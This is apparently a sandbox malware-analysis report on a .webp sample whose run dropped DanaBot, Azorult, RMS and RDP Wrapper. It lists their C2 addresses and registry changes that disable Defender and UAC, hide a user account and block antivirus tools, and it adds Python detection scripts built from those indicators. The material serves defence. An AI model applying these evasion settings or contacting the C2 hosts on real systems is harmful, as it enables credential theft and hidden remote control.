Resubmissions
Task ID | Score | Submitted
(current submission) | | 19/05/2025, 10:22
250519-meq5taem8v | 10 | 19/05/2025, 10:18
250519-mbxheswqv4 | 8 | 19/05/2025, 10:13
250519-l89ctawqs5 | 8 | 19/05/2025, 10:11
250519-l7zf8ael7t | 8 |
Analysis
max time kernel: 413s
max time network: 409s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted
19/05/2025, 10:22
Static task: static1
Behavioral task: behavioral1
Sample: 20250322_162339.webp
Resource: win10v2004-20250502-en
General
Target: 20250322_162339.webp
Size: 19KB
MD5: ef439ff12a62dea539e91f246b5e1896
SHA1: f0fccda707b281101a1ec7e1fd311c64a29fb91f
SHA256: a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
SHA512: 03c002de8fb431e5ee120cabd6ae99c1b45aef144a66b7cefb3610debb4650b8d6d40fea302208dbae9a2c055a86af711ac1d22ff3806a5b5b80813e43a56c12
SSDEEP: 384:T1PihSgOzvjvr0v+GvAO83OqheFeGwK418GhR2rOhEqKWNIgBrj8xCaVd:gSZjjQRvAOnLFUf19hRXkqQUEd
These hashes identify only the submitted 19 KB .webp. The behavior recorded below comes from PE files fetched during the run (msedge.exe is listed under Downloads MZ/PE file on the same flow, 218, that contacted raw.githubusercontent.com), so the dropped payloads have to be hashed separately if they are to be tracked.
Malware Config
Extracted
danabot
51.178.195.151
51.222.39.81
149.255.35.125
38.68.50.179
51.77.7.204
Extracted
azorult
http://boglogov.site/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Danabot family
-
Danabot x86 payload 1 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
resource | yara_rule
behavioral1/files/0x000a0000000240fe-1698.dat | family_danabot
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | Azorult.exe
These are the Group Policy locations for Defender's real-time protection switches; a value of 1 here disables the corresponding protection regardless of what the Windows Security UI shows, and Tamper Protection, where enabled, is what blocks such writes. Each value is written twice, once natively and once under WOW6432Node, so both registry views are covered.
Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | taskhostw.exe
Rms family
RMS (Remote Manipulator System) remote-administration components; its server (rutserv.exe) and client (rfusclient.exe) binaries appear under Executes dropped EXE.
-
UAC bypass 3 TTPs 5 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | regedit.exe
ConsentPromptBehaviorAdmin=0 (elevate without prompting) takes effect immediately for administrators; EnableLUA=0 turns UAC off entirely but only after a reboot. The same values being written by regedit.exe as well as Azorult.exe suggests a .reg file was imported in addition to the direct writes, though the command line is not shown in this section.
Windows security bypass 2 TTPs 1 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | regedit.exe
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid | Process
2204 | net.exe
1620 | net1.exe
Blocklisted process makes network request 24 IoCs
Process | pid | flows
rundll32.exe | 5524 | 224, 251, 262, 268, 275, 280, 282, 293, 293, 324, 324, 563
rundll32.exe | 2748 | 225, 252, 263, 269, 276, 279, 281, 292, 292, 325, 325, 564
Both PIDs also appear under Loads dropped DLL: the dropped DLL is being run through rundll32.exe, and those two instances are the ones talking out, in near lock-step pairs of flows.
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | Azorult.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | Azorult.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | Azorult.exe
The blocked names are installers and on-demand scanners from ESET (eav/eis/essf trial builds and the online scanner, in Russian and Ukrainian localisations), Avast, HitmanPro, 360 and Cezurity. DisallowRun is an Explorer shell policy: it stops these names from being launched from the desktop or Explorer, not from CreateProcess calls made by other programs.
Downloads MZ/PE file 4 IoCs
flow | pid | Process
218 | 3476 | msedge.exe (4 occurrences)
Drops file in Drivers directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | Azorult.exe
The report does not record what was written; the hosts file on an affected host should be diffed against a clean copy, since this is the usual place to redirect security-vendor and update domains.
Modifies Windows Firewall 2 TTPs 23 IoCs
netsh.exe PIDs: 1952, 1572, 5276, 3720, 1616, 2220, 3448, 3272, 424, 652, 5308, 5356, 4404, 3884, 5676, 2416, 5016, 5572, 4424, 5900, 3528, 4468, 1436
Arguments are not shown in this section; the rules added or deleted should be taken from the process tree. At least one inbound rule for TCP 3389 is to be expected from RDPWInst.exe, since RDP Wrapper's installer adds one.
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | RDPWInst.exe
The legitimate value is %SystemRoot%\System32\termsrv.dll. rdpwrap.dll is RDP Wrapper, which replaces the Terminal Services service DLL so that concurrent RDP sessions are accepted on a client edition of Windows; the same installer sets AllowMultipleTSSessions (see Modifies WinLogon) and drops rfxvmt.dll into System32. Any ServiceDll for TermService that does not point at termsrv.dll is worth alerting on.
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
attrib.exe PIDs: 2200, 3920, 5668
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description: Key value queried | ioc: \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation
Process | count
WScript.exe | 3
winlog.exe | 1
winlogon.exe | 1
taskhost.exe | 1
cheat.exe | 1
R8.exe | 1
cmd.exe | 1
Azorult.exe | 1
wini.exe | 1
Executes dropped EXE 38 IoCs
pid | Process
1324 | DanaBot.exe
5768 | DanaBot.exe
4184 | DanaBot.exe
5144 | DanaBot.exe
5452 | SpySheriff.exe
5300 | SpySheriff.exe
5316 | Azorult.exe
4676 | Azorult.exe
6116 | wini.exe
4900 | winit.exe
1748 | rutserv.exe
3112 | rutserv.exe
3416 | rutserv.exe
5092 | cheat.exe
4312 | ink.exe
6124 | rutserv.exe
1472 | rfusclient.exe
5284 | rfusclient.exe
5388 | taskhost.exe
1216 | P.exe
4344 | rfusclient.exe
5236 | Mabezat.exe
5400 | Mabezat.exe
4184 | R8.exe
2492 | winlog.exe
3952 | winlogon.exe
3384 | Rar.exe
5188 | taskhostw.exe
5808 | taskhostw.exe
5988 | RDPWInst.exe
5356 | winlogon.exe
552 | RDPWInst.exe
2296 | taskhostw.exe
3020 | taskhostw.exe
5060 | Mabezat.exe
5324 | Mabezat.exe
5424 | taskhostw.exe
5520 | taskhostw.exe
Several dropped files carry the names of system processes (winlogon.exe, taskhost.exe, taskhostw.exe, winlog.exe); the Run key below shows taskhostw.exe living in C:\ProgramData\RealtekHD, not System32. PIDs are reused during the run (4184 appears for both DanaBot.exe and R8.exe), so cross-references by PID need the event order as well.
Loads dropped DLL 8 IoCs
pid | Process
4812 | regsvr32.exe (2 occurrences)
4548 | regsvr32.exe
5524 | rundll32.exe (2 occurrences)
2748 | rundll32.exe (2 occurrences)
1844 | svchost.exe
svchost.exe loading a dropped DLL is consistent with the Terminal Services host picking up rdpwrap.dll after the ServiceDll change listed under Server Software Component.
Modifies file permissions 1 TTPs 62 IoCs
icacls.exe PIDs: 4668, 4668, 5312, 4920, 220, 4908, 5696, 5616, 916, 4756, 2416, 5476, 3312, 5644, 4820, 5268, 2256, 2084, 4016, 5600, 3252, 4976, 5496, 5480, 1016, 2256, 3920, 5644, 5136, 2092, 5320, 4052, 5556, 668, 6116, 5852, 5196, 1836, 5036, 3044, 5972, 3712, 3464, 1380, 3084, 1396, 4468, 3256, 4872, 1748, 4152, 3136, 2388, 5112, 5396, 2460, 5688, 3692, 1632, 3412, 1164, 520
Targets and ACL changes are not shown here; pull the icacls command lines from the process tree before concluding which directories were locked down.
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | taskhostw.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Azorult.exe
This row is a write, not a read: it is the same EnableLUA=0 change already listed under UAC bypass.
pid Process 3252 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow | ioc
216, 217, 218, 219, 317, 318, 340, 341 | raw.githubusercontent.com
334, 335 | iplogger.org
Flow 218 is also the one under Downloads MZ/PE file, so at least one PE payload was staged on raw.githubusercontent.com.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
307 | ip-api.com
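Malware Config above gives five DanaBot C2 addresses and one Azorult C2 URL, and the two network signatures here add raw.githubusercontent.com, iplogger.org and ip-api.com. The following Python script is an added example, not part of this report or of any tool it names: it checks constructed flow-log lines (format assumed for the example: timestamp, client, process, destination IP, port, host/SNI, URL, with "-" for an absent field) against those indicators, treating the C2 indicators as high severity and the shared services as medium, and uses a parent-domain match so that a look-alike host such as raw.githubusercontent.com.evil.example does not match. The log lines and the non-indicator addresses (documentation ranges) are constructed.

```python
from urllib.parse import urlsplit

# Indicators taken from the Malware Config and network signatures in this report.
DANABOT_C2 = {'51.178.195.151', '51.222.39.81', '149.255.35.125', '38.68.50.179', '51.77.7.204'}
AZORULT_C2_URL = 'http://boglogov.site/index.php'
# Shared, legitimate infrastructure the run touched: alert and correlate, do not block the host outright.
SHARED_HOSTS = {
    'raw.githubusercontent.com': 'payload staging',
    'iplogger.org': 'victim tracking',
    'ip-api.com': 'external IP lookup',
}

# Constructed flow log (not from the report). Fields: ts client process dst_ip dst_port host url,
# with '-' where a field is absent (raw TCP has no host or URL). Non-indicator addresses use
# documentation ranges; the GitHub path is made up.
SAMPLE_FLOW_LOG = """\
2025-05-19T10:23:01Z 10.0.0.5 msedge.exe 192.0.2.10 443 raw.githubusercontent.com https://raw.githubusercontent.com/example/repo/main/file.bin
2025-05-19T10:23:07Z 10.0.0.5 rundll32.exe 51.222.39.81 443 - -
2025-05-19T10:23:09Z 10.0.0.5 Azorult.exe 203.0.113.10 80 boglogov.site http://boglogov.site/index.php
2025-05-19T10:23:12Z 10.0.0.5 wini.exe 192.0.2.20 80 ip-api.com http://ip-api.com/json
2025-05-19T10:23:15Z 10.0.0.5 msedge.exe 192.0.2.30 443 www.bing.com https://www.bing.com/
2025-05-19T10:23:20Z 10.0.0.5 cheat.exe 198.51.100.7 443 iplogger.org https://iplogger.org/1abc2
2025-05-19T10:23:25Z 10.0.0.5 svchost.exe 198.51.100.9 443 raw.githubusercontent.com.evil.example https://raw.githubusercontent.com.evil.example/x
"""


def host_matches(host, indicator):
    """Exact or parent-domain match; 'a.b.evil.example' never matches 'a.b'."""
    host = host.lower().rstrip('.')
    return host == indicator or host.endswith('.' + indicator)


def classify(dst_ip, host, url):
    """Return (severity, label) for one record, or None when nothing matched."""
    if dst_ip in DANABOT_C2:
        return ('high', 'DanaBot C2 address')
    if url != '-':
        seen, c2 = urlsplit(url), urlsplit(AZORULT_C2_URL)
        # Match on host and path only, so a query string or a TLS variant still hits.
        if seen.hostname == c2.hostname and seen.path == c2.path:
            return ('high', 'Azorult C2 URL')
    for shared, role in SHARED_HOSTS.items():
        if host_matches(host, shared):
            return ('medium', f'{shared} ({role}): legitimate service, correlate with the process')
    return None


def scan(log_text):
    """Return (ts, process, severity, label) for every matching line, in input order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _client, proc, dst_ip, _port, host, url = line.split(maxsplit=6)
        verdict = classify(dst_ip, host, url)
        if verdict:
            hits.append((ts, proc, verdict[0], verdict[1]))
    return hits


if __name__ == '__main__':
    for ts, proc, sev, label in scan(SAMPLE_FLOW_LOG):
        print(f'{ts} {sev:<6} {proc:<13} {label}')
```

The medium-severity hits are deliberately not blocks: raw.githubusercontent.com and ip-api.com have plenty of legitimate traffic, and the useful signal in this report is the process on the other end (rundll32.exe, wini.exe, cheat.exe), which is why the script keeps the process name alongside the verdict.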
Modifies WinLogon 2 TTPs 7 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWInst.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | Azorult.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x000a000000024152-2124.dat | autoit_exe
behavioral1/files/0x0008000000024174-2198.dat | autoit_exe
behavioral1/files/0x00080000000242b7-2284.dat | autoit_exe
behavioral1/memory/5356-2523-0x0000000000460000-0x000000000054C000-memory.dmp | autoit_exe
The memory hit is in PID 5356, listed as a dropped winlogon.exe under Executes dropped EXE; the same region is also flagged as UPX-packed below.
Drops file in System32 directory 5 IoCs
description | ioc | Process
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | powershell.exe
File created | C:\Windows\System32\rfxvmt.dll | RDPWInst.exe
File opened for modification | C:\Windows\System32\GroupPolicy | powershell.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | powershell.exe
Registry.pol and gpt.ini are the local Group Policy store, so powershell.exe is writing local policy here; the Registry.pol should be decoded to see which settings were pushed. rfxvmt.dll is dropped by the RDP Wrapper installer when the file is missing from the host.
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | Azorult.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | regedit.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | reg.exe
A UserList entry of 0 hides the account from the logon screen and the Users control panel; registry value names are case-insensitive, so the lowercase "john" written by reg.exe is the same entry. Taken together with the net.exe activity under Grants admin privileges and RDP Hijacking and the RDP Wrapper install, this points to a hidden account meant for remote access, though the command that created or elevated "John" is not shown in this section.
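The registry writes listed under Modifies Windows Defender Real-time Protection settings, UAC bypass, Blocks application from running via registry modification, Adds Run key to start application, Server Software Component: Terminal Services DLL, Modifies WinLogon and Hide Artifacts: Hidden Users are the rows an analyst turns into a rule table. The following Python script is an added example, not part of the report or of any tool it names: it parses rows in the report's own "description ioc Process" layout (the sample rows are copied from this page, with one constructed benign row), normalizes the hive prefix and the WOW6432Node redirection so that 32-bit and 64-bit writes hit the same rule, and maps each hit to an ATT&CK technique. The row format, the rule thresholds and the technique mapping are choices made for the example.

```python
import re
from dataclasses import dataclass

# Constructed input: registry rows copied from this report's "description ioc Process"
# tables (paths and values verbatim), plus one benign row that no rule should match.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe',
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe',
    # Benign control row (constructed for this example, not from the report).
    r'Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation WScript.exe',
]

# One report row: <operation> <path>[ = "<value>"] <process>. Paths may contain spaces,
# so the path group is lazy and the process is pinned to the final whitespace-free token.
ROW_RE = re.compile(
    r'^(?P<op>Key created|Key opened|Key queried|Key value queried|Key value enumerated|'
    r'Set value \((?:int|str)\))\s+'
    r'(?P<path>\\REGISTRY\\.+?)'
    r'(?:\s+=\s+"(?P<value>[^"]*)")?'
    r'\s+(?P<proc>\S+)$'
)
HIVE_RE = re.compile(r'^\\REGISTRY\\(MACHINE|USER\\S-1-5-[\d-]+)\\', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique ID chosen for this example
    detail: str
    process: str


def normalize(path):
    r"""Map \REGISTRY\MACHINE\ to HKLM\ and \REGISTRY\USER\<sid>\ to HKU\, and drop the
    WOW6432Node redirection so 32-bit and 64-bit writes are compared the same way."""
    m = HIVE_RE.match(path)
    if not m:
        return path
    hive = 'HKLM' if m.group(1).upper() == 'MACHINE' else 'HKU'
    rest = path[m.end():]
    wow = 'SOFTWARE\\WOW6432Node\\'
    if rest.upper().startswith(wow.upper()):
        rest = 'SOFTWARE\\' + rest[len(wow):]
    return hive + '\\' + rest


def evaluate(row):
    """Apply the rule table to one row; returns a Finding or None."""
    m = ROW_RE.match(row)
    if not m:
        return None
    op, path, value, proc = m.group('op', 'path', 'value', 'proc')
    full = normalize(path)
    parent, _, leaf = full.rpartition('\\')
    parent_l, leaf_l = parent.lower(), leaf.lower()
    if parent_l == r'hklm\software\policies\microsoft\windows defender\real-time protection' \
            and leaf_l.startswith('disable') and value == '1':
        return Finding('T1562.001', f'Defender real-time protection: {leaf}=1 via policy key', proc)
    if parent_l.startswith(r'hklm\software\microsoft\windows defender\exclusions') and op == 'Key created':
        return Finding('T1562.001', f'Defender exclusion key {leaf} created', proc)
    if parent_l == r'hklm\software\microsoft\windows\currentversion\policies\system' \
            and leaf in ('EnableLUA', 'ConsentPromptBehaviorAdmin', 'PromptOnSecureDesktop') and value == '0':
        return Finding('T1548.002', f'UAC weakened: {leaf}=0', proc)
    if r'\currentversion\policies\explorer\disallowrun' in full.lower() and value is not None:
        what = 'DisallowRun policy enabled' if leaf == 'DisallowRun' else f'execution of {value} blocked by DisallowRun'
        return Finding('T1562.001', what, proc)
    if parent_l.endswith(r'\currentversion\run') and value is not None:
        return Finding('T1547.001', f'Run key "{leaf}" -> {value}', proc)
    if parent_l.endswith(r'\winlogon\specialaccounts\userlist') and value == '0':
        return Finding('T1564.002', f'local account {leaf} hidden from logon UI', proc)
    if parent_l.endswith(r'\services\termservice\parameters') and leaf_l == 'servicedll' \
            and value is not None and not value.lower().endswith('termsrv.dll'):
        return Finding('T1505.005', f'TermService ServiceDll replaced with {value}', proc)
    if leaf_l == 'allowmultipletssessions' and value == '1':
        return Finding('T1021.001', 'AllowMultipleTSSessions=1 (concurrent RDP sessions allowed)', proc)
    return None


def triage(rows):
    """Run every rule over every row; findings come back in input order."""
    return [f for f in (evaluate(r) for r in rows) if f is not None]


def summarize(findings):
    """Count findings per technique ID."""
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == '__main__':
    for f in triage(SAMPLE_ROWS):
        print(f'{f.technique}  {f.process:<14} {f.detail}')
    print(summarize(triage(SAMPLE_ROWS)))
```

The ServiceDll rule is the one worth keeping on a production host: it alerts on any TermService service DLL that is not termsrv.dll, which catches RDP Wrapper and any other replacement, rather than matching the rdpwrap.dll name seen in this run.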
resource | yara_rule
behavioral1/files/0x00080000000243c5-2418.dat | upx
behavioral1/memory/3952-2423-0x0000000000400000-0x0000000000419000-memory.dmp | upx
behavioral1/memory/3952-2490-0x0000000000400000-0x0000000000419000-memory.dmp | upx
behavioral1/files/0x00070000000243e6-2512.dat | upx
behavioral1/memory/5356-2517-0x0000000000460000-0x000000000054C000-memory.dmp | upx
behavioral1/memory/5356-2523-0x0000000000460000-0x000000000054C000-memory.dmp | upx
PIDs 3952 and 5356 are both listed as dropped winlogon.exe instances under Executes dropped EXE.
Drops file in Program Files directory 64 IoCs
Azorult.exe, File opened for modification (21 rows, all security-product install directories):
C:\Program Files\COMODO
C:\Program Files (x86)\AVAST Software
C:\Program Files\Common Files\McAfee
C:\Program Files\AVAST Software
C:\Program Files (x86)\Cezurity
C:\Program Files\Cezurity
C:\Program Files\Enigma Software Group
C:\Program Files (x86)\GRIZZLY Antivirus
C:\Program Files\Malwarebytes
C:\Program Files (x86)\AVG
C:\Program Files\ESET
C:\Program Files (x86)\Microsoft JDX
C:\Program Files (x86)\SpyHunter
C:\Program Files\ByteFence
C:\Program Files (x86)\Panda Security
C:\Program Files (x86)\Zaxar
C:\Program Files (x86)\360
C:\Program Files\SpyHunter
C:\Program Files\Kaspersky Lab
C:\Program Files (x86)\Kaspersky Lab
C:\Program Files\AVG
Azorult.exe, File created (1 row):
C:\Program Files\Common Files\System\iediagcmd.exe
RDPWInst.exe, File created (2 rows):
C:\Program Files\RDP Wrapper\rdpwrap.dll
C:\Program Files\RDP Wrapper\rdpwrap.ini
attrib.exe, File opened for modification (3 rows):
C:\Program Files\RDP Wrapper\rdpwrap.ini
C:\Program Files\RDP Wrapper
C:\Program Files\RDP Wrapper\rdpwrap.dll
msedge.exe, File created (37 rows, all under C:\Program Files\chrome_Unpacker_BeginUnzipping4936_<id>\; this is Edge's component updater unpacking its own components, not sample activity):
2031229069\sets.json
84579926\automation.js
933065173\deny_etld1_domains.list
1616464308\smart_switch_list.json
84579926\manifest.json
933065173\manifest.json
976953327\LICENSE
84579926\travel-facilitated-booking-kayak.js
1559524024\crl-set
2031229069\manifest.json
976953327\keys.json
1764881355\nav_config.json
1764881355\manifest.fingerprint
2031229069\_metadata\verified_contents.json
976953327\manifest.fingerprint
933065173\manifest.fingerprint
2031229069\LICENSE
1715725482\manifest.fingerprint
84579926\extraction.js
1559524024\manifest.fingerprint
1383799245\typosquatting_list.pb
1383799245\manifest.fingerprint
